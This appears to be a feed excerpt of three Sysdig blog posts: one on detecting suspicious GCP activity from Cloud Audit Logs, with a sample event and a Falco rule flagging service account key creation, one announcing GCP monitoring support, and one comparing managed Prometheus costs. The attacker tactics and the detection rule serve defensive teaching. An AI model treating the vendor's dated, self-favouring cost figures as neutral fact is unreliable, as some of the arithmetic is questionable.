You can implement cloud threat detection by tapping into these audit logs and validating them against security policies. That way, you are able to detect and be informed about any misconfiguration, vulnerability, or compromise of private information as soon as it is detected.

The kind of threats you want to detect

Think of the steps attackers would take if they manage to obtain access to your infrastructure.

They’ll try to not get caught by disabling data access logging or deleting monitoring alerts. They could create additional keys for a service account to ensure they continue having access. Also, while they investigate your infrastructure, they’ll probably execute commands in regions that aren’t usually used.

All of those steps leave a recognizable trace in your audit logs.

Once malicious actors have a secure position on your cloud, they can start causing harm. For example, they could change the ACL or IAM policies of a storage bucket. This would make your files accessible to the public, leading to data exfiltration.

But you shouldn’t be looking out for only malicious actors.

One of your developers could create a CGP Cloud Function with an outdated runtime version, possibly containing known vulnerabilities that are already fixed in a more recent version. Those vulnerabilities could be exploited by attackers as an entry point, and then used to perform lateral movement.

Your cloud environment needs a continuous check to flag misconfigurations like these.

Cloud threat detection vs. CWPP and CSPM

While cloud threat detection focuses on your global cloud infrastructure, the CWPP category (Compute Workload Protection Platform) refers to runtime threats, happening in your compute workloads. Both analyze events to detect threats, but at different levels.

The CSPM category (Cloud Security Posture Management) has a completely different approach. It answers the question, “How secure is my cloud account now?” To do so, it focuses on analyzing the current state of the cloud account on a scheduled basis. For this reason, CSPM is more related to compliance and usually relies on different types of benchmarks like those published by the CIS (Center for Internet Security), the cloud providers, or other security standards.

Analyzing the whole static configuration, like CSPM does, gives the advantage of seeing the full picture of the cloud account, but is costly to execute continuously. On the other hand, cloud threat detection can easily detect when assets change to an unsanctioned status.

With all of this in mind, which one should you implement?

Well, all of them.

CSPM will highlight the points of your cloud infrastructure in need of better security, CWPP will flag anything fishy going on in your applications, and cloud threat detection will allow you to react to suspicious activity in your cloud infrastructure.

Implementing threat detection in GCP: Cloud Audit Logs

The service inside Google Cloud Platform (GCP) that enables cloud threat detection is Cloud Audit Logs.

The four audit logs

Inside Cloud Audit Logs, you’ll find four different kinds of logs:

  • Actions which modify the configuration or metadata of resources will leave a trace in the Admin Activity audit log.
  • Actions taken by Google which modify the configuration of resources will leave a trace in the System Event audit log.
  • Actions which read the configuration or metadata of resources, as well as actions which create, modify, or read data, will leave a trace in the Data Access audit log.
  • Actions which result in a security policy violation, and are thus denied by the Google Cloud Service, leave a trace in the Policy Denied audit log.

Be aware that public resources with the Identity and Access Management (IAM) policies allAuthenticatedUsers or allUsers won’t leave events on these logs for privacy reasons.

The Admin Activity audit log and the System Event audit log are always enabled. However, the Data Access audit log is disabled by default because it can grow really fast. The Policy Denied audit log is enabled by default, but could be disabled.

What an audit event looks like

All four of these audit logs are stored in JSON format and share some important structure, all including a protoPayload key consisting of the following fields:

  • authenticationInfo
  • authorizationInfo
  • serviceName
  • methodName
  • resourceName
  • request
  • requestMetadata
  • response
  • @type

There are several other fields outside the payload, including the timestamp of the entry, the resource affected, or the severity of the event.

In all cases @type contains the string type.googleapis.com/google.cloud.audit.AuditLog.

The following is an example of an entry in the Admin Activity audit log:

{
  "protoPayload": {
    "@type": "type.googleapis.com/google.cloud.audit.AuditLog",
    "status": {},
    "authenticationInfo": {
      "principalEmail": "juanya.villanueva@sysdig.com",
      "principalSubject": "user:juanya.villanueva@sysdig.com"
    },
    "requestMetadata": {},
    "serviceName": "iam.googleapis.com",
    "methodName": "google.iam.admin.v1.CreateServiceAccountKey",
    "authorizationInfo": [
      {
        "granted": true,
        "resource": "projects/-/serviceAccounts/123456789012345678901",
        "permission": "iam.serviceAccountKeys.create",
        "resourceAttributes": {}
      }
    ],
    "resourceName": "projects/-/serviceAccounts/123456789012345678901",
    "request": {
      "@type": "type.googleapis.com/google.iam.admin.v1.CreateServiceAccountKeyRequest",
      "name": "projects/-/serviceAccounts/ab1c315d6e7fgh6891026@test.iam.gserviceaccount.com",
      "private_key_type": 2
    },
    "response": {},
  "insertId": "m8ab679xmpg5",
  "resource": {
    "type": "service_account",
    "labels": {}
  },
  "timestamp": "2021-03-17T17:33:44.852270Z",
  "severity": "NOTICE",
  "logName": "projects/sample-project/logs/cloudaudit.googleapis.com%2Factivity",
  "receiveTimestamp": "2021-03-17T17:33:49.462759141Z"
}

Processing GCP audit logs

The first part of cloud threat detection is generating all these audit events. The second part is validating them against your security policies.

Other services, like your security tools, can consume these events via a Pub/Sub topic.

First, you filter the audit logs and send your selected events to a sink that will forward them to a Pub/Sub topic. You just have to subscribe your security tool endpoints to this topic so they can process them.

These sinks will encrypt and validate the logs to make sure they are not tampered with after GCP generates them.

How Sysdig Secure for cloud implements runtime detection in GCP

Sysdig Secure for cloud taps into the Google Cloud Platform audit logs and processes the audit events against your security policies, defined by Falco rules.

A specialized ingestor feeds on the Cloud Audit Logs and forwards the GCP events to an evaluator.

Provisioned with a rich set of custom, out-of-the-box Falco rules, this evaluator will generate security events that can be reviewed inside the Sysdig Secure interface, GCP Trace, or GCP Security Command Center.

Out-of-the-box Falco rules mapped to compliance controls

The Falco rule language has become the de-facto standard to define suspicious activity in the cloud, and its flexibility allows for fine-grained customization to your operational needs.

While the out-of-the-box Falco rules, pre-bundled with Sysdig Secure for cloud, will save you time getting started, you can still customize them or add new rules to this library to detect any cloud activity.

The included GCP Cloud Audit Logs rules are mapped against compliance controls, like those in MITRE ATT&CK, and can detect events like:

Sysdig Secure for cloud comes bundled with a rich set of out-of-the-box Falco rules, that besides MITRE ATT&CK®, corresponds to security standards and benchmarks like NIST 800-53, PCI DSS, SOC 2, CIS AWS, or AWS Foundational Security Best Practices.

Detecting a configuration change with Cloud Audit Logs

Let’s see an example of GCP threat detection in action with Cloud Audit Logs and Sysdig Secure for cloud.

Take a look at the Admin Activity audit log event we presented before:

{
  "protoPayload": {
    "@type": "type.googleapis.com/google.cloud.audit.AuditLog",
    "status": {},
    "authenticationInfo": {
      "principalEmail": "juanya.villanueva@sysdig.com",
      "principalSubject": "user:juanya.villanueva@sysdig.com"
    },
    "requestMetadata": {},
    "serviceName": "iam.googleapis.com",
    "methodName": "google.iam.admin.v1.CreateServiceAccountKey",
    "authorizationInfo": [
      {
        "granted": true,
        "resource": "projects/-/serviceAccounts/123456789012345678901",
        "permission": "iam.serviceAccountKeys.create",
        "resourceAttributes": {}
      }
    ],
    "resourceName": "projects/-/serviceAccounts/123456789012345678901",
    "request": {
      "@type": "type.googleapis.com/google.iam.admin.v1.CreateServiceAccountKeyRequest",
      "name": "projects/-/serviceAccounts/ab1c315d6e7fgh6891026@test.iam.gserviceaccount.com",
      "private_key_type": 2
    },
    "response": {},
  "insertId": "m8ab679xmpg5",
  "resource": {
    "type": "service_account",
    "labels": {}
  },
  "timestamp": "2021-03-17T17:33:44.852270Z",
  "severity": "NOTICE",
  "logName": "projects/sample-project/logs/cloudaudit.googleapis.com%2Factivity",
  "receiveTimestamp": "2021-03-17T17:33:49.462759141Z"
}

This event captures the creation of a service account key, which can pose a security threat.

The key fields in this event are:

  • serviceName: Containing the service who fires the event, iam.googleapis.com.
  • methodName: With the actual method invoked, google.iam.admin.v1.CreateServiceAccountKey.
  • principalEmail: Is the user which invokes the event, juanya.villanueva@sysdig.com.
  • resourceName: The resource that will be modified, projects/-/serviceAccounts/123456789012345678901.
  • status: Reflects the status of the request.

A non-empty status field in a request means that it could not be processed because of an error. For example, the requester may not have had permission to perform the action. We might not be interested in these events.

Let’s go back to our example. This event tells us that a key has just been created, for the service account google.iam.admin.v1.CreateServiceAccountKey, related to the resource projects/-/serviceAccounts/123456789012345678901.

A Falco rule to detect this security event would look like:

- rule: GCP Create Service Account Key
  desc: Detect creating an access key for a service account.
  condition:
    jevt.value[/serviceName]="iam.googleapis.com" and
    jevt.value[/methodName]="google.iam.admin.v1.CreateServiceAccountKey" and
    jevt.value[/status]=""
  output:
    An access key has been created for a service account
    (requesting user=%jevt.value[/authenticationInfo/principalEmail],
     service account=%jevt.value[/resourceName])
  priority: CRITICAL
  tags:
    - cloud
    - gcp
    - gcp_iam
    - cis_controls_16
    - mitre_T1550-use-alternate-authentication-material
  source: gcp_auditlog

Note that this is one of the out-of-the-box rules included in Sysdig Secure for cloud.

Using jevt.value and a query in jsonpath format, we can reference parts of the audit event.

We use this in the condition part of the rule:

  condition:
    jevt.value[/serviceName]="iam.googleapis.com" and
    jevt.value[/methodName]="google.iam.admin.v1.CreateServiceAccountKey" and
    jevt.value[/status]=""

This condition filters events: related to the IAM service, that create a Service Account Key, and having an empty status.

The same is true for %jevt.value, which we use in the output part of the rule:

  output:
    An access key has been created for a service account
    (requesting user=%jevt.value[/authenticationInfo/principalEmail],
     service account=%jevt.value[/resourceName])

This output is used to provide context information, given that this rule ends up generating a security event. In that case, this output will be sent through all of the enabled notification channels, for example, creating a security event in your Sysdig Secure account.

We have one final note on creating Falco rules for cloud events.

This is a regular Falco rule, following the regular Falco syntax. The compatibility with GCP Cloud Event Logs is achieved by handling its events as JSON objects and referring to the event information using JSONPath. This mixes two standards that your security engineers might be already familiar with, making it easier to customize and create your own rules.

Conclusions

Cloud threat detection is critical to ensure the security of your cloud security, and it’s a complement to CWPP and CSPM.

When it comes to the Google Cloud Platform, GCP Cloud Audit Logs is a great tool that enables you to monitor your infrastructure and detect security issues as they happen.

Sysdig Secure for cloud is a great source of truth as it can see everything that is happening in your GCP accounts. The comprehensive set of out-of-the-box Falco rules in Sysdig Secure minimizes the setup effort, response time, and resources needed for investigating security events.

With Sysdig Secure for cloud, you can continuously flag cloud misconfigurations before the bad guys get in, and detect suspicious activity like unusual logins from leaked credentials. This all happens in a single console, making it easier to validate your cloud security posture. And it only takes a few minutes to get started!

Start securing your cloud for free with our Sysdig Free Tier!

The Sysdig Secure DevOps Platform provides the visibility you need to confidently run containers, Kubernetes, and cloud. It’s built on an open-source stack with SaaS delivery, and is radically simple to run and scale.

Request a free trial today!

The post Detect suspicious activity in GCP using audit logs appeared first on Sysdig.

]]>
Easily Monitor Google Cloud with Sysdig’s Managed Prometheus https://sysdig.com/blog/native-support-gcp-monitor/ Wed, 08 Mar 2023 20:54:00 +0000 https://sysdig.com/?p=68090 Read about monitoring Google Cloud services and how to incorporate GCP metrics in Sysdig Monitor.

The post Easily Monitor Google Cloud with Sysdig’s Managed Prometheus appeared first on Sysdig.

]]>
Google Cloud provides its own set of metrics for monitoring applications, services, and instances. There are a huge number of metrics – more than 1,500 different ones just for GCP monitoring! While this is great, dealing with such a number can also be overwhelming. Filtering, pulling, exploring, and storing the metrics that you really need can be an enormously time-consuming task, and a big challenge.

GCP offers its own Prometheus managed service, which can be used to collect and explore the GCP Prometheus metrics, as well as some other metrics that you may want to scrape from other exporters. It is a separate product so it has its own pricing model.

Sysdig can help to alleviate this excessive burden.

Today we are happy to announce the general availability of GCP metrics support in Sysdig Monitor. Just connect your GCP account, enable the integration, and benefit from the out-of-the-box GCP monitoring.

Multi-cloud monitoring with Sysdig Monitor

Thanks to its multi-cloud integration model, Sysdig customers can easily monitor AWS, Azure, and GCP workloads and services from a single pane of glass.

You can now correlate your own applications, services, and Prometheus metrics with Kubernetes and cloud context, without any extra effort.

Forget about taking care of exporters or any other service to pull your GCP metrics. Everything is handled by Sysdig Monitor. The same way Sysdig Monitor works with third-party applications and services, it offers a completely smooth experience for GCP integration.

All the steps you need to link your GCP account successfully with Sysdig Monitor are provided through a step-by-step wizard. Tons of predefined alerts, and a bundle of out-of-the-box dashboards to monitor and troubleshoot your GPC services, are some of the benefits of integrating and monitoring GCP with Sysdig Monitor.

These, and other benefits like the Kubernetes and cloud metrics enrichment or the automatic metrics ingestion, are supported and maintained by Sysdig. You don’t need to waste time on these things anymore. Rather, use your time for what’s most important: your business.

Integrating GCP is easy. After a few minutes, you’ll have access to plenty of information from your Cloud instances and services.

How to get started

The GCP monitoring integration is available now! If you want to start pulling your GCP Prometheus metrics, just follow these few steps:

  1. In the Sysdig Monitor panel, go to Integrations and click on Cloud Metrics.
  2. Click on Add Account to launch the Cloud integration assistant.
  3. Select GCP and choose between Organization or Single, depending on whether you want to connect your whole org or a single project.
  4. Follow the instructions to configure this Cloud integration.
  5. Wait a few minutes and look for the new out-of-the-box GCP dashboards.

Dig deeper into GCP with Sysdig integrations

In this new release, Sysdig has prepared a set of new integrations for GCP – from checking the health and performance of your GCP Cloud MySQL, PostgreSQL, or SQL Server instances, to ensuring your GCP compute engine instances are behaving properly. A new bundle of predefined alerts and out-of-the-box dashboards will be automatically shown a few minutes after you configure the GCP integration in the Sysdig Monitor portal.

Conclusion

Integrating GCP with Sysdig Monitor is super simple. Thanks to this new integration, you can now store and explore your own GCP service metrics in a few minutes!

The main public Cloud providers like AWS, Azure, and GCP are integrated into the multi-cloud Sysdig Monitor platform. You can not only monitor and troubleshoot your cloud-native workloads, but also your own cloud provider metrics. In Sysdig Monitor, everything is close by. You can have full control of all your cloud environments from a single place.

Sign up here for a free trial of Sysdig Monitor. While you are there be sure to check out our Kubernetes troubleshooting, managed Prometheus, and cost optimization features.

The post Easily Monitor Google Cloud with Sysdig’s Managed Prometheus appeared first on Sysdig.

]]>
How Much Does Your Managed Service for Prometheus Cost? https://sysdig.com/blog/managed-service-prometheus/ Tue, 25 Apr 2023 14:45:51 +0000 https://sysdig.com/?p=71131 […] AWS (10s) over 252B samples 52,607,794.78 267,840.00 $0.16 10,000,000.00 0.0043 GCP (60s) First 50B samples 1,120,071.68 44,640.00 $0.15 1,000,000.00 0.0067 GCP (60s) Next 50B-250B samples 4,480,286.74 44,640.00 $0.12 1,000,000.00 0.0054 GCP (60s) Next 250B-500B samples 5,600,358.42 44,640.00 $0.09 1,000,000.00 0.0040 GCP (60s) >500B samples 42,347,938.15 44,640.00 $0.06 1,000,000.00 0.0027 GCP (30s) First 50B samples 560,035.84 89,280.00 $0.15 1,000,000.00 0.0134 GCP (30s) Next 50B-250B samples 2,240,143.37 89,280.00 $0.12 1,000,000.00 0.0107 GCP (30s) Next 250B-500B samples 2,800,179.21 89,280.00 $0.09 1,000,000.00 0.0080 GCP (30s) >500B samples 47,948,296.58 89,280.00 $0.06 1,000,000.00 0.0054 GCP (10s) First 50B samples 186,678.61 267,840.00 $0.15 1,000,000.00 0.0402 GCP (10s) Next 50B-250B samples 746,714.46 267,840.00 $0.12 1,000,000.00 0.0321 GCP (10s) Next 250B-500B samples 933,393.07 267,840.00 $0.09 1,000,000.00 0.0241 GCP (10s) >500B samples 51,681,868.86 267,840.00 $0.06 1,000,000.00 0.0161 Azure (60s) Any number of samples 44,640.00 $0.16 10,000,000.00 0.0007 Azure (30s) Any number of samples 89,280.00 $0.16 10,000,000.00 0.0014 Azure (10s) Any number of samples 267,840.00 $0.16 10,000,000.00 0.0043 Grafana Labs (60s) First 20,000 TS Included in subscription Grafana Labs (60s) > 20,000 TS 0.0080 Sysdig (10s) node exporter, cAdvisor, KSM TS Included in subscription Sysdig (10s) First 2,000 TS per node Included in subscription Sysdig (10s) > 2,000 TS per node 0.0050 K8s single cluster use case Note that the number of time series you can have in your Prometheus instance can vary significantly and is dependent on your architecture. The more applications, and operational tasks like redeploy, creation, deletion, and scaling in your cluster, the more time series you will generate. Depending on how volatile your Pods and Kubernetes objects are, cardinality explosions may occur and can cause serious trouble. The more time series, the more storage you need, and the more prone you are to scalability and performance issues, and much more cost. Let’s mock up a sample architecture that will serve as a foundation to estimate the managed service for Prometheus costs for every vendor. For this use case, we have the following information about the Kubernetes infrastructure: One Kubernetes cluster 25 nodes Next, you’ll find the total number of time series registered in the Prometheus instance after a few days. This Kubernetes cluster was running under a normal load, not being stressed by heavy workloads or peaks of user activity. To emulate a minimal and a likely application lifecycle, we redeployed a few applications every day. These are the number of time series generated by job: kubernetes-apiservers: 73,713 TS kubernetes-pods: 275,421 TS kubernetes-nodes-cadvisor: 257,649 TS kubernetes-service-endpoints (node exporter + KSM): 144,202 TS kubernetes-nodes: 42,166 TS kube-dns: 370 TS etcd: 4399 TS prometheus: 1068 TS felix_metrics: 4008 TS kube_controller_metrics: 63 TS Time series TOTAL: 803,059 In terms of query processing and user activity, let’s start with the following assumptions: 10 different users accessing Prometheus with their own dashboards and graphs reporting data for their projects. An average of eight graphs querying data per user. The refresh interval for each graph is 10 seconds. Assuming an average of two hours per user and day, it corresponds to 720 queries. 5,760 is the total number of queries for eight graphs per day and user. Data is being shown in a three hour timeframe on average. The highest number of samples processed in this environment for 3 hours is: 867,303,720. We’ll assume 300,000 samples on average per query. Monitoring query processing ~525,657,600,000 (1) Alerting query processing ~5,256,000,000,000 (2) (1) Monitoring query processing has been calculated from: 10 monitoring users * 5,760 queries per day and user * 30 days a month * 300,000 avg samples per query (3h). (2) Alerting query processing has been calculated from: 2 executions per minute * 200 alerts * 60 minutes per hour * 730 hours per month * 300,000 avg samples per alerting rule. Once we have all the data, let’s do some math! First, we need to calculate the number of samples ingested based on our numbers. 803,059 TS / 10 collection interval in seconds * 3600 seconds * 744 hours in a month = 215,091,322,560 -> ~215 billion samples. For those services where storage costs are charged, let’s assume that storage initially needed for that volume of metrics is ~12GB. With regards to queries processed, based on previous calculations, we’ll assume that the total volume of queries is ~5,781 billion queries / month. You may think this number is too large but, on the contrary, it may be too small if we take into account that for a single query you may be querying millions of samples. Notice that a 10 seconds sampling interval was used to calculate the total number of samples. Some vendors like Grafana Labs implement a 60 second sampling interval by default. Disclaimer: Following, you’ll find a quick calculation of the managed service for Prometheus costs for every vendor. Bear in mind that this is an approximation, cost may fluctuate depending on the usage of your monitoring platform. AWS Let’s see what the costs charged by each service would be. Service Cost TS first 2B samples 2B samples * $0.90 /10M = $180 TS next 250B samples 213,091,322,560 samples * $0.35/10M = $7,458.19 Storage $0.03 * 12.92GB * 365 days = $141.52 / month Query Samples Processed (QSP) $0.10/ B * 5,781 B queries = $578.1 / month Total cost $180 + $7,458.19 + $141.52 + $578.1 = $8,357.81 / month So, if you own an Amazon managed service for Prometheus for processing the monitoring data belonging to the architecture defined earlier, you would spend around $8,357 a month. GCP It’s now time to analyze the pricing for Google Cloud monitoring. Service Cost TS first 50B samples 50B samples * $0.15 /1M = $7,500 Next 50B-250B samples 165,091,322,560 samples * $0.12/1M = $19,810.95 Total cost $7,500 + $19,810.95 = $27,310.95 If you own a Google Cloud monitoring instance for processing the same data, you’ll pay around $27,310 a month. Azure Let’s analyze the Azure offering for monitoring and ingesting your Prometheus metrics. Service Cost TS 215,091,322,560 * $0.16 /10M = $3,441.46 Query processing $0.10/ B * 5,781 B queries = $578.1 Total cost $3,441.46 + $578.1 = $4,019.56 / month Using Azure for this specific use case would cost around $4,019 a month, and you’d also need to take into account the costs related to alerts and notifications, which are extra assets that would be charged. Grafana Labs These are the Grafana Labs costs for its Grafana Cloud product with a 10-second sampling interval. Since the cost will vary depending on your active metrics, let’s suppose all of your metrics (100%) are active. Service Cost Service fee $299 / month TS first 20k included in subscription TS > 20k 803,059-20k = 783,059 * $8 / 1,000 = $6,264.4 […]

The post How Much Does Your Managed Service for Prometheus Cost? appeared first on Sysdig.

]]>
Are you using a managed service for Prometheus and finding the costs too high? Or are you considering delegating your Prometheus metrics ingestion, processing, and management and want to know more about the costs involved?

Nowadays, many companies opt for a managed service for Prometheus instead of maintaining their own OSS Prometheus monitoring bundle. This approach is becoming increasingly common, as it allows businesses to reduce their operational and infrastructure monitoring spending and take the burden off.

When evaluating and ultimately choosing a managed Prometheus service, there are many factors to consider, with pricing being one of the most important. Planning ahead and understanding how costs are calculated is crucial to avoid unpleasant surprises in the form of unexpected high bills.

This article will provide insights into how the leading managed Prometheus service providers charge for their services, highlighting the most expensive and the most affordable options.

Managed service for Prometheus pricing

Disclaimer: In this article, you’ll find the prices that correspond to the time this blog post was written (April 2023). For current pricing, please check the public pricing information from every vendor.

AWS

The current Amazon managed service for Prometheus prices are available here. Amazon also provides its own pricing calculator to estimate your bill.

Amazon charges for different services within its Amazon managed service for Prometheus, like the metric ingestion costs, storage, and query. Metric ingestion is charged per sample.

Metrics ingestionCost ($/10M samples)
First 2 billion samples$0.90
Next 250 billion samples$0.35
Over 252 billion samples$0.16
Other costs
Metrics storage$0.03/Gb-Mo
Query Samples Processed (QSP)$0.10/B samples processed

Google Cloud

Google Cloud monitoring pricing is available on its website. Google also has its own pricing calculator, just select “Cloud operations (Logging, Monitoring, Trace, Managed Prometheus)” and estimate your bill.

Google Cloud charges metric ingestion per sample. The following table shows the Google Cloud monitoring pricing.

Metrics ingestionCost ($/1M samples)
First 50 billion (B) samples$0.15
Next 50B-250B samples$0.12
Next 250B-500B samples$0.09
> 500B samples$0.06

Some other items such as “Monitoring API calls” usage and “Execution of monitoring uptime checks” may or may not be charged, depending on the usage within a full month.

Azure

Azure Monitor pricing is available here. If you want to estimate your Azure Monitor bill, you can use its pricing calculator. Azure charges metrics ingestion per sample.

Metrics ingestionCost ($/10M samples)
Any number of samples$0.16
QueriesCost ($/1B samples)
Metrics queries$0.10

Azure charges for alerts and notifications as well, like emails, push notifications, or web hooks, among others.

Grafana Labs

If you want to check the Grafana Cloud pricing model, visit its website. In the pricing page, you can also calculate the estimated cost of your bill. Grafana Labs charges metrics ingestion per time series (TS).

Metrics ingestionCost ($/1000 time series)
First 20K TSIncluded in monthly usage subscription
Next 1K TS$8

Grafana Labs charges based on active series, which may cause your bill to vary depending on your metric usage. On the other hand, alerting and QSP are included, so no extra costs are incurred.

Per Grafana Labs documentation, a time series is considered active if new data points have been received within the last 15 or 30 minutes.

Sysdig Monitor

Sysdig Monitor charges metric ingestion per time series. Following, you’ll find Sysdig’s metrics pricing.

Metrics ingestionCost ($/1000 time series)
Node exporter, cAdvisor, and KSM metrics included$0
First 2K TS included in agent subscription per node$0
> 2K TS per agent$5

Note that node exporter, KSM, and cAdvisor time series metrics are included in the Sysdig Agent price. Hence, these time series are not charged. In addition, alerting and QSP are included, you won’t be charged for these features either.

Price comparison per TS

If you extrapolate the information you obtained from providers that charge based on samples, you can obtain the time series equivalent. This way, you can compare costs between managed Prometheus services providers.

How can you calculate the TS equivalent from samples? Let’s get TS equivalent data from different ingestion sampling intervals.

  • 60s interval -> 1TS / 60s * 3,600s in an hour * 744 hours in a month = 44,640 samples
  • 30s interval -> 1TS / 30s * 3,600s in an hour * 744 hours in a month = 89,280 samples
  • 10s interval -> 1TS / 10s * 3,600s in an hour * 744 hours in a month = 267,840 samples

Based on these numbers you can easily convert prices per sample into prices per time series.

VendorTS conversionNumber of samplesPriceSamples per price unitCost
AWS (60s) 2B samples44,802.8744,640.00$0.9010,000,000.000.0040
AWS (60s) Next 250B samples5,600,358.4244,640.00$0.3510,000,000.000.0016
AWS (60s) over 252B samples47,903,493.7144,640.00$0.1610,000,000.000.0007
AWS (30s) 2B samples22,401.4389,280.00$0.9010,000,000.000.0080
AWS (30s) Next 250B samples2,800,179.2189,280.00$0.3510,000,000.000.0031
AWS (30s) over 252B samples50,726,074.3589,280.00$0.1610,000,000.000.0014
AWS (10s) 2B samples7,467.14267,840.00$0.9010,000,000.000.0241
AWS (10s) Next 250B samples933,393.07267,840.00$0.3510,000,000.000.0094
AWS (10s) over 252B samples52,607,794.78267,840.00$0.1610,000,000.000.0043
GCP (60s) First 50B samples1,120,071.6844,640.00$0.151,000,000.000.0067
GCP (60s) Next 50B-250B samples4,480,286.7444,640.00$0.121,000,000.000.0054
GCP (60s) Next 250B-500B samples5,600,358.4244,640.00$0.091,000,000.000.0040
GCP (60s) >500B samples42,347,938.1544,640.00$0.061,000,000.000.0027
GCP (30s) First 50B samples560,035.8489,280.00$0.151,000,000.000.0134
GCP (30s) Next 50B-250B samples2,240,143.3789,280.00$0.121,000,000.000.0107
GCP (30s) Next 250B-500B samples2,800,179.2189,280.00$0.091,000,000.000.0080
GCP (30s) >500B samples47,948,296.5889,280.00$0.061,000,000.000.0054
GCP (10s) First 50B samples186,678.61267,840.00$0.151,000,000.000.0402
GCP (10s) Next 50B-250B samples746,714.46267,840.00$0.121,000,000.000.0321
GCP (10s) Next 250B-500B samples933,393.07267,840.00$0.091,000,000.000.0241
GCP (10s) >500B samples51,681,868.86267,840.00$0.061,000,000.000.0161
Azure (60s) Any number of samples44,640.00$0.1610,000,000.000.0007
Azure (30s) Any number of samples89,280.00$0.1610,000,000.000.0014
Azure (10s) Any number of samples267,840.00$0.1610,000,000.000.0043
Grafana Labs (60s) First 20,000 TSIncluded in subscription
Grafana Labs (60s) > 20,000 TS0.0080
Sysdig (10s) node exporter, cAdvisor, KSM TSIncluded in subscription
Sysdig (10s) First 2,000 TS per nodeIncluded in subscription
Sysdig (10s) > 2,000 TS per node0.0050

K8s single cluster use case

Note that the number of time series you can have in your Prometheus instance can vary significantly and is dependent on your architecture. The more applications, and operational tasks like redeploy, creation, deletion, and scaling in your cluster, the more time series you will generate. Depending on how volatile your Pods and Kubernetes objects are, cardinality explosions may occur and can cause serious trouble. The more time series, the more storage you need, and the more prone you are to scalability and performance issues, and much more cost.

Let’s mock up a sample architecture that will serve as a foundation to estimate the managed service for Prometheus costs for every vendor.

For this use case, we have the following information about the Kubernetes infrastructure:

  • One Kubernetes cluster
  • 25 nodes

Next, you’ll find the total number of time series registered in the Prometheus instance after a few days. This Kubernetes cluster was running under a normal load, not being stressed by heavy workloads or peaks of user activity. To emulate a minimal and a likely application lifecycle, we redeployed a few applications every day. These are the number of time series generated by job:

  • kubernetes-apiservers: 73,713 TS
  • kubernetes-pods: 275,421 TS
  • kubernetes-nodes-cadvisor: 257,649 TS
  • kubernetes-service-endpoints (node exporter + KSM): 144,202 TS
  • kubernetes-nodes: 42,166 TS
  • kube-dns: 370 TS
  • etcd: 4399 TS
  • prometheus: 1068 TS
  • felix_metrics: 4008 TS
  • kube_controller_metrics: 63 TS
  • Time series TOTAL: 803,059

In terms of query processing and user activity, let’s start with the following assumptions:

  • 10 different users accessing Prometheus with their own dashboards and graphs reporting data for their projects.
  • An average of eight graphs querying data per user.
  • The refresh interval for each graph is 10 seconds. Assuming an average of two hours per user and day, it corresponds to 720 queries. 5,760 is the total number of queries for eight graphs per day and user.
  • Data is being shown in a three hour timeframe on average.
  • The highest number of samples processed in this environment for 3 hours is: 867,303,720.
  • We’ll assume 300,000 samples on average per query.
  • Monitoring query processing ~525,657,600,000 (1)
  • Alerting query processing ~5,256,000,000,000 (2)

(1) Monitoring query processing has been calculated from: 10 monitoring users * 5,760 queries per day and user * 30 days a month * 300,000 avg samples per query (3h).

(2) Alerting query processing has been calculated from: 2 executions per minute * 200 alerts * 60 minutes per hour * 730 hours per month * 300,000 avg samples per alerting rule.

Once we have all the data, let’s do some math!

First, we need to calculate the number of samples ingested based on our numbers.

803,059 TS / 10 collection interval in seconds * 3600 seconds * 744 hours in a month = 215,091,322,560 -> ~215 billion samples.

For those services where storage costs are charged, let’s assume that storage initially needed for that volume of metrics is ~12GB.

With regards to queries processed, based on previous calculations, we’ll assume that the total volume of queries is ~5,781 billion queries / month. You may think this number is too large but, on the contrary, it may be too small if we take into account that for a single query you may be querying millions of samples.

Notice that a 10 seconds sampling interval was used to calculate the total number of samples. Some vendors like Grafana Labs implement a 60 second sampling interval by default.

Disclaimer: Following, you’ll find a quick calculation of the managed service for Prometheus costs for every vendor. Bear in mind that this is an approximation, cost may fluctuate depending on the usage of your monitoring platform.

AWS

Let’s see what the costs charged by each service would be.

ServiceCost
TS first 2B samples2B samples * $0.90 /10M = $180
TS next 250B samples213,091,322,560 samples * $0.35/10M = $7,458.19
Storage$0.03 * 12.92GB * 365 days = $141.52 / month
Query Samples Processed (QSP)$0.10/ B * 5,781 B queries = $578.1 / month
Total cost$180 + $7,458.19 + $141.52 + $578.1 = $8,357.81 / month

So, if you own an Amazon managed service for Prometheus for processing the monitoring data belonging to the architecture defined earlier, you would spend around $8,357 a month.

GCP

It’s now time to analyze the pricing for Google Cloud monitoring.

ServiceCost
TS first 50B samples50B samples * $0.15 /1M = $7,500
Next 50B-250B samples165,091,322,560 samples * $0.12/1M = $19,810.95
Total cost$7,500 + $19,810.95 = $27,310.95

If you own a Google Cloud monitoring instance for processing the same data, you’ll pay around $27,310 a month.

Azure

Let’s analyze the Azure offering for monitoring and ingesting your Prometheus metrics.

ServiceCost
TS215,091,322,560 * $0.16 /10M = $3,441.46
Query processing$0.10/ B * 5,781 B queries = $578.1
Total cost$3,441.46 + $578.1 = $4,019.56 / month

Using Azure for this specific use case would cost around $4,019 a month, and you’d also need to take into account the costs related to alerts and notifications, which are extra assets that would be charged.

Grafana Labs

These are the Grafana Labs costs for its Grafana Cloud product with a 10-second sampling interval.

Since the cost will vary depending on your active metrics, let’s suppose all of your metrics (100%) are active.

ServiceCost
Service fee$299 / month
TS first 20kincluded in subscription
TS > 20k803,059-20k = 783,059 * $8 / 1,000 = $6,264.4
Total cost$299 + $6,264.4 = $6,563.4

With Grafana Labs, total cost would be around $6,563 a month.

Sysdig Monitor

Sysdig Monitor implements a 10-second sampling interval by default, resulting in up to 6x more metrics compared to competitors and at a lower cost, as you’ll see next.

First of all, you need to pull out node exporter, cAdvisor, and KSM metrics from the current numbers. For the sake of simplicity, let’s subtract the following jobs from the total number of time series:

  • kubernetes-nodes-cadvisor: 257,649 TS
  • kubernetes-service-endpoints (node exporter + KSM): 144,202 TS
  • kubernetes-nodes: 42,166 TS

The new TOTAL number of time series is: 803,059 – 257,649 – 144,202 – 42,166 = 359,042 TS. The number of billable time series has been reduced by ~55%!

ServiceCost
Agent cost$30 * 25 nodes = $750
Metrics included in agent subscription2,000 * 25 nodes = 50,000 TS included free of charge
Metrics ingestionNext 309,042 * $5 / 1,000 = $1,545.21 / month
Total cost$750 + 1,545.21 = $2,295.21 / month

If you use Sysdig Monitor as your managed service for Prometheus, you’d pay around $2,295 a month.

Price comparison

After doing all the calculations, it’s time to sum up the costs of every service. This time, the price is calculated by TS for different ingestion intervals (60s, 30s, and 10s).

